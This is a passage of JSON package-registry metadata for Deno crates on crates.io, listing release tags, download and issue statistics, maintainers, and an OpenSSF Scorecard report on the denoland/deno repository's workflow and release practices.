"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:12:57.862Z","dependent_packages_count":4,"downloads":88366,"downloads_period":"total","dependent_repos_count":4,"rankings":{"downloads":8.903545552760212,"dependent_repos_count":10.531727490606123,"dependent_packages_count":7.415416020867198,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":6.760086466222242,"average":5.611869230245257},"purl":"pkg:cargo/deno_flash","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_flash","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_flash","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_flash/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-08T05:50:47.927Z","updated_at":"2022-11-08T05:50:47.927Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T05:50:51.929Z","updated_at":"2022-11-08T05:50:51.929Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:27.808Z","updated_at":"2023-07-18T22:41:27.808Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13674634,"name":"deno_node_crypto","ecosystem":"cargo","description":"Node crypto compatibility for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":27,"first_release_published_at":"2026-02-12T15:04:12.919Z","latest_release_published_at":"2026-08-06T11:46:56.783Z","latest_release_number":"0.27.0","last_synced_at":"2026-08-29T21:57:19.636Z","created_at":"2026-02-12T15:17:52.045Z","updated_at":"2026-08-30T11:48:15.782Z","registry_url":"https://crates.io/crates/deno_node_crypto/","install_command":"cargo install deno_node_crypto","documentation_url":"https://docs.rs/deno_node_crypto/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: 